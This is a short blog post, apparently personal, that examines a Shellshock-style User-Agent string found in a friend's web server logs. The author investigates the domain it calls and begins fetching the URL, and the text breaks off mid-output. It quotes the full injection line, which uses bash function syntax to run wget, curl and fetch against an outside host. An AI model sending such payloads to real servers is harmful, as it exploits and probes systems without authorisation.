Indirect shellshock security scanning via other people's logfiles
One of my friends noted that he'd spotted a shellshock-style user-agent string in his web log files, looking like:

24.71.248.218 - - [28/Apr/2016:16:55:30 -0500] "GET / HTTP/1.1" 403 4961 "-" "() { :; }; /bin/sh -c 'wget http://closettransfer.com/IPTRANSITTEST -O /dev/null;wget1 http://closettransfer.com/IPTRANSITTEST -O /dev/null;curl http://closettransfer.com/IPTRANSITTEST -o /dev/null;/usr/sfwbin/wget http://closettransfer.com/IPTRANSITTEST;fetch -/dev/null http://closettransfer.com/IPTRANSITTEST'"

Curious about whether it was a legitimate domain (perhaps owned), I googled the domain name: Seasonally-appropriate designer labels. Doesn't really seem like the kind of thing a white-hat security scanner would be pretending to be. Was the domain compromised and I should try to notify them? Hmm.

What the heck - try to download the page:

--2016-04-30 13:38:26-- http://closettransfer.com/IPTRANSITTEST
Resolving closettransfer.